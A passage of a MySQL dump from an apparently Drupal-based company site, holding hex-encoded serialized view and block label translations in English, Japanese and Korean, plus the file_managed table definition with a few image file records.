706f7365645f666f726d223b613a313a7b733a373a226f7074696f6e73223b613a353a7b733a31333a227375626d69745f627574746f6e223b733a363a2246696c746572223b733a31383a2272657365745f627574746f6e5f6c6162656c223b733a353a225265736574223b733a31393a226578706f7365645f736f7274735f6c6162656c223b733a373a22536f7274206279223b733a31343a22736f72745f6173635f6c6162656c223b733a333a22417363223b733a31353a22736f72745f646573635f6c6162656c223b733a343a2244657363223b7d7d733a353a22656d707479223b613a313a7b733a31363a22617265615f746578745f637573746f6d223b613a313a7b733a373a22636f6e74656e74223b733a32303a224e6f2070656f706c6520617661696c61626c652e223b7d7d733a373a2266696c74657273223b613a343a7b733a373a22636f6d62696e65223b613a313a7b733a363a226578706f7365223b613a313a7b733a353a226c6162656c223b733a32323a224e616d65206f7220656d61696c20636f6e7461696e73223b7d7d733a363a22737461747573223b613a313a7b733a31303a2267726f75705f696e666f223b613a323a7b733a353a226c6162656c223b733a363a22537461747573223b733a31313a2267726f75705f6974656d73223b613a323a7b693a313b613a313a7b733a353a227469746c65223b733a363a22416374697665223b7d693a323b613a313a7b733a353a227469746c65223b733a373a22426c6f636b6564223b7d7d7d7d733a31353a22726f6c65735f7461726765745f6964223b613a313a7b733a363a226578706f7365223b613a313a7b733a353a226c6162656c223b733a343a22526f6c65223b7d7d733a31303a227065726d697373696f6e223b613a313a7b733a363a226578706f7365223b613a313a7b733a353a226c6162656c223b733a31303a225065726d697373696f6e223b7d7d7d733a31333a227573655f6d6f72655f74657874223b733a343a226d6f7265223b7d7d733a363a22706167655f31223b613a323a7b733a31333a22646973706c61795f7469746c65223b733a343a2250616765223b733a31353a22646973706c61795f6f7074696f6e73223b613a323a7b733a343a226d656e75223b613a323a7b733a353a227469746c65223b733a343a224c697374223b733a31313a226465736372697074696f6e223b733a35303a2246696e6420616e64206d616e6167652070656f706c6520696e746572616374696e67207769746820796f757220736974652e223b7d733a31313a227461625f6f7074696f6e73223b613a323a7b733a353a227469746c65223b733a363a2250656f706c65223b733a31313a226465736372697074696f6e223b733a34353a224d616e6167652075736572206163636f756e74732c20726f6c65732c20616e64207065726d697373696f6e732e223b7d7d7d7d7d),
('language.en', 'views.view.watchdog', 0x613a333a7b733a353a226c6162656c223b733a383a225761746368646f67223b733a31313a226465736372697074696f6e223b733a31393a22526563656e74206c6f67206d65737361676573223b733a373a22646973706c6179223b613a323a7b733a373a2264656661756c74223b613a323a7b733a31333a22646973706c61795f7469746c65223b733a373a2244656661756c74223b733a31353a22646973706c61795f6f7074696f6e73223b613a363a7b733a353a227469746c65223b733a31393a22526563656e74206c6f67206d65737361676573223b733a363a226669656c6473223b613a383a7b733a373a226e6f7468696e67223b613a313a7b733a31313a2261646d696e5f6c6162656c223b733a343a2249636f6e223b7d733a333a22776964223b613a313a7b733a353a226c6162656c223b733a333a22574944223b7d733a383a227365766572697479223b613a313a7b733a353a226c6162656c223b733a383a225365766572697479223b7d733a343a2274797065223b613a313a7b733a353a226c6162656c223b733a343a2254797065223b7d733a393a2274696d657374616d70223b613a313a7b733a353a226c6162656c223b733a343a2244617465223b7d733a373a226d657373616765223b613a323a7b733a353a226c6162656c223b733a373a224d657373616765223b733a353a22616c746572223b613a323a7b733a343a2270617468223b733a33353a2261646d696e2f7265706f7274732f64626c6f672f6576656e742f7b7b20776964207d7d223b733a333a22616c74223b733a31333a227b7b206d657373616765207d7d223b7d7d733a343a226e616d65223b613a323a7b733a353a226c6162656c223b733a343a2255736572223b733a393a22736570617261746f72223b733a323a222c20223b7d733a343a226c696e6b223b613a313a7b733a353a226c6162656c223b733a31303a224f7065726174696f6e73223b7d7d733a353a227061676572223b613a313a7b733a373a226f7074696f6e73223b613a323a7b733a343a2274616773223b613a323a7b733a343a226e657874223b733a363a22e280bae280ba223b733a383a2270726576696f7573223b733a363a22e280b9e280b9223b7d733a363a226578706f7365223b613a333a7b733a32303a226974656d735f7065725f706167655f6c6162656c223b733a31343a224974656d73207065722070616765223b733a33323a226974656d735f7065725f706167655f6f7074696f6e735f616c6c5f6c6162656c223b733a373a222d20416c6c202d223b733a31323a226f66667365745f6c6162656c223b733a363a224f6666736574223b7d7d7d733a31323a226578706f7365645f666f726d223b613a313a7b733a373a226f7074696f6e73223b613a353a7b733a31333a227375626d69745f627574746f6e223b733a363a2246696c746572223b733a31383a2272657365745f627574746f6e5f6c6162656c223b733a353a225265736574223b733a31393a226578706f7365645f736f7274735f6c6162656c223b733a373a22536f7274206279223b733a31343a22736f72745f6173635f6c6162656c223b733a333a22417363223b733a31353a22736f72745f646573635f6c6162656c223b733a343a2244657363223b7d7d733a353a22656d707479223b613a313a7b733a343a2261726561223b613a323a7b733a31313a2261646d696e5f6c6162656c223b733a32363a224e6f206c6f67206d6573736167657320617661696c61626c652e223b733a373a22636f6e74656e74223b733a32363a224e6f206c6f67206d6573736167657320617661696c61626c652e223b7d7d733a373a2266696c74657273223b613a323a7b733a343a2274797065223b613a313a7b733a363a226578706f7365223b613a313a7b733a353a226c6162656c223b733a343a2254797065223b7d7d733a383a227365766572697479223b613a313a7b733a363a226578706f7365223b613a313a7b733a353a226c6162656c223b733a383a225365766572697479223b7d7d7d7d7d733a343a2270616765223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a343a2250616765223b7d7d7d),
('language.en', 'views.view.who_s_new', 0x613a333a7b733a353a226c6162656c223b733a393a2257686f2773206e6577223b733a31313a226465736372697074696f6e223b733a35333a2253686f77732061206c697374206f6620746865206e65776573742075736572206163636f756e7473206f6e2074686520736974652e223b733a373a22646973706c6179223b613a323a7b733a373a2264656661756c74223b613a323a7b733a31333a22646973706c61795f7469746c65223b733a373a2244656661756c74223b733a31353a22646973706c61795f6f7074696f6e73223b613a323a7b733a353a227469746c65223b733a393a2257686f2773206e6577223b733a31323a226578706f7365645f666f726d223b613a313a7b733a373a226f7074696f6e73223b613a353a7b733a31333a227375626d69745f627574746f6e223b733a353a224170706c79223b733a31383a2272657365745f627574746f6e5f6c6162656c223b733a353a225265736574223b733a31393a226578706f7365645f736f7274735f6c6162656c223b733a373a22536f7274206279223b733a31343a22736f72745f6173635f6c6162656c223b733a333a22417363223b733a31353a22736f72745f646573635f6c6162656c223b733a343a2244657363223b7d7d7d7d733a373a22626c6f636b5f31223b613a323a7b733a31333a22646973706c61795f7469746c65223b733a393a2257686f2773206e6577223b733a31353a22646973706c61795f6f7074696f6e73223b613a333a7b733a31393a22646973706c61795f6465736372697074696f6e223b733a31393a2241206c697374206f66206e6577207573657273223b733a31373a22626c6f636b5f6465736372697074696f6e223b733a393a2257686f2773206e6577223b733a31343a22626c6f636b5f63617465676f7279223b733a343a2255736572223b7d7d7d7d),
('language.en', 'views.view.who_s_online', 0x613a333a7b733a353a226c6162656c223b733a31383a2257686f2773206f6e6c696e6520626c6f636b223b733a31313a226465736372697074696f6e223b733a39333a2253686f7773207468652075736572206e616d6573206f6620746865206d6f737420726563656e746c79206163746976652075736572732c20616e642074686520746f74616c206e756d626572206f66206163746976652075736572732e223b733a373a22646973706c6179223b613a323a7b733a373a2264656661756c74223b613a323a7b733a31333a22646973706c61795f7469746c65223b733a373a2244656661756c74223b733a31353a22646973706c61795f6f7074696f6e73223b613a353a7b733a353a227469746c65223b733a31323a2257686f2773206f6e6c696e65223b733a31323a226578706f7365645f666f726d223b613a313a7b733a373a226f7074696f6e73223b613a353a7b733a31333a227375626d69745f627574746f6e223b733a353a224170706c79223b733a31383a2272657365745f627574746f6e5f6c6162656c223b733a353a225265736574223b733a31393a226578706f7365645f736f7274735f6c6162656c223b733a373a22536f7274206279223b733a31343a22736f72745f6173635f6c6162656c223b733a333a22417363223b733a31353a22736f72745f646573635f6c6162656c223b733a343a2244657363223b7d7d733a353a22656d707479223b613a313a7b733a31363a22617265615f746578745f637573746f6d223b613a313a7b733a373a22636f6e74656e74223b733a33353a225468657265206172652063757272656e746c792030207573657273206f6e6c696e652e223b7d7d733a373a2266696c74657273223b613a313a7b733a363a22616363657373223b613a313a7b733a363a226578706f7365223b613a323a7b733a353a226c6162656c223b733a31313a224c61737420616363657373223b733a31313a226465736372697074696f6e223b733a37373a2241207573657220697320636f6e73696465726564206f6e6c696e6520666f722074686973206c6f6e6720616674657220746865792068617665206c61737420766965776564206120706167652e223b7d7d7d733a363a22686561646572223b613a313a7b733a363a22726573756c74223b613a313a7b733a373a22636f6e74656e74223b733a34303a225468657265206172652063757272656e746c792040746f74616c207573657273206f6e6c696e652e223b7d7d7d7d733a31383a2277686f5f735f6f6e6c696e655f626c6f636b223b613a323a7b733a31333a22646973706c61795f7469746c65223b733a31323a2257686f2773206f6e6c696e65223b733a31353a22646973706c61795f6f7074696f6e73223b613a323a7b733a31393a22646973706c61795f6465736372697074696f6e223b733a34353a2241206c697374206f662075736572732074686174206172652063757272656e746c79206c6f6767656420696e2e223b733a31373a22626c6f636b5f6465736372697074696f6e223b733a31323a2257686f2773206f6e6c696e65223b7d7d7d7d),
('language.ja', 'block.block.companyhistory', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31323a22e4bc9ae7a4bee6b2bfe99da9223b7d7d),
('language.ja', 'block.block.companyprofile', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31323a22e4bc9ae7a4bee68385e5a0b1223b7d7d),
('language.ja', 'block.block.contactus_2', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31323a22e4bc9ae7a4bee6a682e8a681223b7d7d),
('language.ja', 'block.block.futuregoal', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31353a22e4bc9ae7a4bee381aee79baee6a899223b7d7d),
('language.ja', 'block.block.missionvisiontitle', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a32343a22e79baee6a899202620e3839fe38383e382b7e383a7e383b3223b7d7d),
('language.ja', 'block.block.ourservices', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31323a22e4ba8be6a5ade58685e5aeb9223b7d7d),
('language.ja', 'block.block.views_block__activity_block_1', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a31313a2276696577735f6c6162656c223b733a363a22e6b4bbe58b95223b7d7d),
('language.ja', 'block.block.views_block__announcement_block_1', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a31313a2276696577735f6c6162656c223b733a31323a22e3818ae79fa5e38289e3819b223b7d7d),
('language.ja', 'block.block.visionmission', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a32343a22e79baee6a899202620e3839fe38383e382b7e383a7e383b3223b7d7d),
('language.ja', 'shortcut.set.default', 0x613a313a7b733a353a226c6162656c223b733a31353a22e38387e38395e382a9e383abe38388223b7d),
('language.ja', 'tour.tour.views-ui', 0x613a313a7b733a343a2274697073223b613a313a7b733a31353a2276696577732d75692d6669656c6473223b613a313a7b733a353a226c6162656c223b733a31353a22e38395e382a3e383bce383abe38389223b7d7d7d),
('language.ja', 'views.view.activity', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a363a22706167655f31223b613a313a7b733a31353a22646973706c61795f6f7074696f6e73223b613a313a7b733a363a226669656c6473223b613a313a7b733a393a22766965775f6e6f6465223b613a313a7b733a343a2274657874223b733a33303a22e38282e381a3e381a8e8aaade38280e381abe381afe38193e381a1e38289223b7d7d7d7d7d7d),
('language.ja', 'views.view.announcement', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a363a22706167655f31223b613a313a7b733a31353a22646973706c61795f6f7074696f6e73223b613a313a7b733a363a226669656c6473223b613a313a7b733a393a22766965775f6e6f6465223b613a313a7b733a343a2274657874223b733a33303a22e38282e381a3e381a8e8aaade38280e381abe381afe38193e381a1e38289223b7d7d7d7d7d7d),
('language.ja', 'views.view.archive', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a31353a22e38387e38395e382a9e383abe38388223b7d7d7d),
('language.ja', 'views.view.block_content', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a31353a22e38387e38395e382a9e383abe38388223b7d7d7d),
('language.ja', 'views.view.comment', 0x613a313a7b733a373a22646973706c6179223b613a323a7b733a373a2264656661756c74223b613a323a7b733a31333a22646973706c61795f7469746c65223b733a31353a22e38387e38395e382a9e383abe38388223b733a31353a22646973706c61795f6f7074696f6e73223b613a313a7b733a363a226669656c6473223b613a313a7b733a31373a22636f6d6d656e745f62756c6b5f666f726d223b613a313a7b733a31323a22616374696f6e5f7469746c65223b733a31353a22e382a2e382afe382b7e383a7e383b3223b7d7d7d7d733a31353a22706167655f756e617070726f766564223b613a313a7b733a31353a22646973706c61795f6f7074696f6e73223b613a313a7b733a363a226669656c6473223b613a313a7b733a31373a22636f6d6d656e745f62756c6b5f666f726d223b613a313a7b733a31323a22616374696f6e5f7469746c65223b733a31353a22e382a2e382afe382b7e383a7e383b3223b7d7d7d7d7d7d),
('language.ja', 'views.view.comments_recent', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a31353a22e38387e38395e382a9e383abe38388223b7d7d7d),
('language.ja', 'views.view.content', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a31353a22e38387e38395e382a9e383abe38388223b7d7d7d),
('language.ja', 'views.view.content_recent', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a31353a22e38387e38395e382a9e383abe38388223b7d7d7d),
('language.ja', 'views.view.content_translations', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31353a22646973706c61795f6f7074696f6e73223b613a323a7b733a363a226669656c6473223b613a313a7b733a31383a227472616e736c6174696f6e5f737461747573223b613a313a7b733a353a226c6162656c223b733a32313a22e7bfbbe8a8b3e382b9e38386e383bce382bfe382b9223b7d7d733a373a2266696c74657273223b613a323a7b733a32383a22636f6e74656e745f7472616e736c6174696f6e5f6f75746461746564223b613a313a7b733a363a226578706f7365223b613a313a7b733a353a226c6162656c223b733a31383a22e7bfbbe8a8b3e69c9fe99990e58887e3828c223b7d7d733a31383a227472616e736c6174696f6e5f737461747573223b613a313a7b733a363a226578706f7365223b613a313a7b733a353a226c6162656c223b733a32313a22e7bfbbe8a8b3e382b9e38386e383bce382bfe382b9223b7d7d7d7d7d7d7d),
('language.ja', 'views.view.files', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a31353a22e38387e38395e382a9e383abe38388223b7d7d7d),
('language.ja', 'views.view.frontpage', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a31353a22e38387e38395e382a9e383abe38388223b7d7d7d),
('language.ja', 'views.view.glossary', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a31353a22e38387e38395e382a9e383abe38388223b7d7d7d),
('language.ja', 'views.view.media', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a323a7b733a31333a22646973706c61795f7469746c65223b733a31353a22e38387e38395e382a9e383abe38388223b733a31353a22646973706c61795f6f7074696f6e73223b613a313a7b733a363a226669656c6473223b613a313a7b733a31353a226d656469615f62756c6b5f666f726d223b613a313a7b733a31323a22616374696f6e5f7469746c65223b733a31353a22e382a2e382afe382b7e383a7e383b3223b7d7d7d7d7d7d),
('language.ja', 'views.view.media_library', 0x613a313a7b733a373a22646973706c6179223b613a323a7b733a373a2264656661756c74223b613a323a7b733a31333a22646973706c61795f7469746c65223b733a31353a22e38387e38395e382a9e383abe38388223b733a31353a22646973706c61795f6f7074696f6e73223b613a313a7b733a363a226669656c6473223b613a313a7b733a31353a226d656469615f62756c6b5f666f726d223b613a313a7b733a31323a22616374696f6e5f7469746c65223b733a31353a22e382a2e382afe382b7e383a7e383b3223b7d7d7d7d733a343a2270616765223b613a313a7b733a31353a22646973706c61795f6f7074696f6e73223b613a313a7b733a363a226669656c6473223b613a333a7b733a31353a226d656469615f62756c6b5f666f726d223b613a313a7b733a31323a22616374696f6e5f7469746c65223b733a31353a22e382a2e382afe382b7e383a7e383b3223b7d733a31303a22656469745f6d65646961223b613a313a7b733a343a2274657874223b733a363a22e7b7a8e99b86223b7d733a31323a2264656c6574655f6d65646961223b613a313a7b733a343a2274657874223b733a363a22e5898ae999a4223b7d7d7d7d7d7d),
('language.ja', 'views.view.related_blocks', 0x613a313a7b733a373a22646973706c6179223b613a323a7b733a373a22626c6f636b5f32223b613a313a7b733a31353a22646973706c61795f6f7074696f6e73223b613a313a7b733a353a227469746c65223b733a31383a22e996a2e980a3e38199e3828be6b4bbe58b95223b7d7d733a373a22626c6f636b5f31223b613a313a7b733a31353a22646973706c61795f6f7074696f6e73223b613a313a7b733a353a227469746c65223b733a32343a22e996a2e980a3e38199e3828be3818ae79fa5e38289e3819b223b7d7d7d7d),
('language.ja', 'views.view.taxonomy_term', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a31353a22e38387e38395e382a9e383abe38388223b7d7d7d),
('language.ja', 'views.view.user_admin_people', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a31353a22e38387e38395e382a9e383abe38388223b7d7d7d),
('language.ja', 'views.view.watchdog', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a31353a22e38387e38395e382a9e383abe38388223b7d7d7d),
('language.ja', 'views.view.who_s_new', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a31353a22e38387e38395e382a9e383abe38388223b7d7d7d),
('language.ja', 'views.view.who_s_online', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a31353a22e38387e38395e382a9e383abe38388223b7d7d7d),
('language.ko', 'block.block.companyhistory', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31333a22ed9a8cec82ac20ec97b0ed9881223b7d7d),
('language.ko', 'block.block.companyprofile', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31333a22ed9a8cec82ac20ec84a4eba6bd223b7d7d),
('language.ko', 'block.block.contactus_2', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a393a22ec97b0eb9dbdecb298223b7d7d),
('language.ko', 'block.block.futuregoal', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a32333a22ed9a8cec82acec9d9820ebafb8eb9e9820ebb984eca084223b7d7d),
('language.ko', 'block.block.ourservices', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31363a22ed9a8cec82ac20ec849cebb984ec8aa4223b7d7d),
('language.ko', 'block.block.views_block__activity_block_1', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a31313a2276696577735f6c6162656c223b733a363a22ed999ceb8f99223b7d7d),
('language.ko', 'block.block.views_block__announcement_block_1', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a31313a2276696577735f6c6162656c223b733a363a22eab3b5eca780223b7d7d),
('language.ko', 'block.block.visionmission', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31373a22566973696f6e2026204d697373696f6e20223b7d7d),
('language.ko', 'shortcut.set.default', 0x613a313a7b733a353a226c6162656c223b733a393a22eab8b0ebb3b8eab092223b7d),
('language.ko', 'tour.tour.views-ui', 0x613a313a7b733a343a2274697073223b613a313a7b733a31353a2276696577732d75692d6669656c6473223b613a313a7b733a353a226c6162656c223b733a363a22ed9584eb939c223b7d7d7d),
('language.ko', 'views.view.activity', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a363a22706167655f31223b613a313a7b733a31353a22646973706c61795f6f7074696f6e73223b613a313a7b733a363a226669656c6473223b613a313a7b733a393a22766965775f6e6f6465223b613a313a7b733a343a2274657874223b733a393a22eb8d94ec9dbdeab8b0223b7d7d7d7d7d7d),
('language.ko', 'views.view.announcement', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a363a22706167655f31223b613a313a7b733a31353a22646973706c61795f6f7074696f6e73223b613a313a7b733a363a226669656c6473223b613a313a7b733a393a22766965775f6e6f6465223b613a313a7b733a343a2274657874223b733a393a22eb8d94ec9dbdeab8b0223b7d7d7d7d7d7d),
('language.ko', 'views.view.archive', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a393a22eab8b0ebb3b8eab092223b7d7d7d),
('language.ko', 'views.view.block_content', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a393a22eab8b0ebb3b8eab092223b7d7d7d),
('language.ko', 'views.view.comment', 0x613a313a7b733a373a22646973706c6179223b613a323a7b733a373a2264656661756c74223b613a323a7b733a31333a22646973706c61795f7469746c65223b733a393a22eab8b0ebb3b8eab092223b733a31353a22646973706c61795f6f7074696f6e73223b613a313a7b733a363a226669656c6473223b613a313a7b733a31373a22636f6d6d656e745f62756c6b5f666f726d223b613a313a7b733a31323a22616374696f6e5f7469746c65223b733a363a22ec95a1ec8598223b7d7d7d7d733a31353a22706167655f756e617070726f766564223b613a313a7b733a31353a22646973706c61795f6f7074696f6e73223b613a313a7b733a363a226669656c6473223b613a313a7b733a31373a22636f6d6d656e745f62756c6b5f666f726d223b613a313a7b733a31323a22616374696f6e5f7469746c65223b733a363a22ec95a1ec8598223b7d7d7d7d7d7d),
('language.ko', 'views.view.comments_recent', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a393a22eab8b0ebb3b8eab092223b7d7d7d),
('language.ko', 'views.view.content', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a393a22eab8b0ebb3b8eab092223b7d7d7d),
('language.ko', 'views.view.content_recent', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a393a22eab8b0ebb3b8eab092223b7d7d7d),
('language.ko', 'views.view.content_translations', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31353a22646973706c61795f6f7074696f6e73223b613a323a7b733a363a226669656c6473223b613a313a7b733a31383a227472616e736c6174696f6e5f737461747573223b613a313a7b733a353a226c6162656c223b733a31333a22ebb288ec97ad20ec8381ed839c223b7d7d733a373a2266696c74657273223b613a323a7b733a32383a22636f6e74656e745f7472616e736c6174696f6e5f6f75746461746564223b613a313a7b733a363a226578706f7365223b613a313a7b733a353a226c6162656c223b733a32363a22ec98a4eb9e98eb909c20ebb288ec97adec9e85eb8b88eb8ba42e223b7d7d733a31383a227472616e736c6174696f6e5f737461747573223b613a313a7b733a363a226578706f7365223b613a313a7b733a353a226c6162656c223b733a31333a22ebb288ec97ad20ec8381ed839c223b7d7d7d7d7d7d7d),
('language.ko', 'views.view.files', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a393a22eab8b0ebb3b8eab092223b7d7d7d),
('language.ko', 'views.view.frontpage', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a393a22eab8b0ebb3b8eab092223b7d7d7d),
('language.ko', 'views.view.glossary', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a393a22eab8b0ebb3b8eab092223b7d7d7d),
('language.ko', 'views.view.media', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a323a7b733a31333a22646973706c61795f7469746c65223b733a393a22eab8b0ebb3b8eab092223b733a31353a22646973706c61795f6f7074696f6e73223b613a313a7b733a363a226669656c6473223b613a313a7b733a31353a226d656469615f62756c6b5f666f726d223b613a313a7b733a31323a22616374696f6e5f7469746c65223b733a363a22ec95a1ec8598223b7d7d7d7d7d7d),
('language.ko', 'views.view.media_library', 0x613a313a7b733a373a22646973706c6179223b613a323a7b733a373a2264656661756c74223b613a323a7b733a31333a22646973706c61795f7469746c65223b733a393a22eab8b0ebb3b8eab092223b733a31353a22646973706c61795f6f7074696f6e73223b613a313a7b733a363a226669656c6473223b613a313a7b733a31353a226d656469615f62756c6b5f666f726d223b613a313a7b733a31323a22616374696f6e5f7469746c65223b733a363a22ec95a1ec8598223b7d7d7d7d733a343a2270616765223b613a313a7b733a31353a22646973706c61795f6f7074696f6e73223b613a313a7b733a363a226669656c6473223b613a333a7b733a31353a226d656469615f62756c6b5f666f726d223b613a313a7b733a31323a22616374696f6e5f7469746c65223b733a363a22ec95a1ec8598223b7d733a31303a22656469745f6d65646961223b613a313a7b733a343a2274657874223b733a31323a22ed8eb8eca791ed9598eab8b0223b7d733a31323a2264656c6574655f6d65646961223b613a313a7b733a343a2274657874223b733a31323a22ec82adeca09ced9598eab8b0223b7d7d7d7d7d7d),
('language.ko', 'views.view.related_blocks', 0x613a313a7b733a373a22646973706c6179223b613a323a7b733a373a22626c6f636b5f32223b613a313a7b733a31353a22646973706c61795f6f7074696f6e73223b613a313a7b733a353a227469746c65223b733a31333a22eab480eba0a820ed999ceb8f99223b7d7d733a373a22626c6f636b5f31223b613a313a7b733a31353a22646973706c61795f6f7074696f6e73223b613a313a7b733a353a227469746c65223b733a31323a22eab3b5eca780ec82aced95ad223b7d7d7d7d),
('language.ko', 'views.view.taxonomy_term', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a393a22eab8b0ebb3b8eab092223b7d7d7d),
('language.ko', 'views.view.user_admin_people', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a393a22eab8b0ebb3b8eab092223b7d7d7d),
('language.ko', 'views.view.watchdog', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a393a22eab8b0ebb3b8eab092223b7d7d7d),
('language.ko', 'views.view.who_s_new', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a393a22eab8b0ebb3b8eab092223b7d7d7d),
('language.ko', 'views.view.who_s_online', 0x613a313a7b733a373a22646973706c6179223b613a313a7b733a373a2264656661756c74223b613a313a7b733a31333a22646973706c61795f7469746c65223b733a393a22eab8b0ebb3b8eab092223b7d7d7d);

-- --------------------------------------------------------

--
-- Table structure for table `file_managed`
--

CREATE TABLE `file_managed` (
  `fid` int UNSIGNED NOT NULL,
  `uuid` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `uid` int UNSIGNED DEFAULT NULL COMMENT 'The ID of the target entity.',
  `filename` varchar(255) DEFAULT NULL,
  `uri` varchar(255) CHARACTER SET utf8mb3 COLLATE utf8mb3_bin NOT NULL,
  `filemime` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL,
  `filesize` bigint UNSIGNED DEFAULT NULL,
  `status` tinyint NOT NULL,
  `created` int DEFAULT NULL,
  `changed` int NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The base table for file entities.';

--
-- Dumping data for table `file_managed`
--

INSERT INTO `file_managed` (`fid`, `uuid`, `langcode`, `uid`, `filename`, `uri`, `filemime`, `filesize`, `status`, `created`, `changed`) VALUES
(3, '2db86a59-6abc-480d-8723-840a63e08233', 'en', 1, 'new_comet_trading_agency.jpg', 'public://inline-images/new_comet_trading_agency.jpg', 'image/jpeg', 41079, 1, 1687231532, 1687231742),
(4, 'bf8cd0c9-33f1-4683-b6f6-edac8a4b14c6', 'en', 1, 'arrow.png', 'public://inline-images/arrow.png', 'image/png', 4768, 1, 1687231681, 1687231742),
(5, '00e5c4fc-4102-4824-b517-a24f5d33361f', 'en', 1, 'arrow_icon.png', 'public://inline-images/arrow_icon.png', 'image/png', 4914, 1, 1687232777, 1687232782),
(6, '42e9d2a3-e284-49bb-81cb-2510b37a5871', 'en', 1, 'new_comet_trading_agency.jpg', 'public://inline-images/new_comet_trading_agency_0.jpg', 'image/jpeg', 41079, 1, 1687235653, 1687235804),
(8, '3cbef209-85d4-4dca-8253-4b5f9cd30235', 'en', 1, 'arrow_icon.png', 'public://inline-images/arrow_icon_1.png', 'image/png', 4914, 1, 1687239500, 1687239503),
(9, '109b8a8f-a099-4327-990d-f54fec10fdf3', 'en', 1, 'arrow_icon.png', 'public://inline-images/arrow_icon_2.png', 'image/png', 4914, 1, 1687239593, 1687239610),
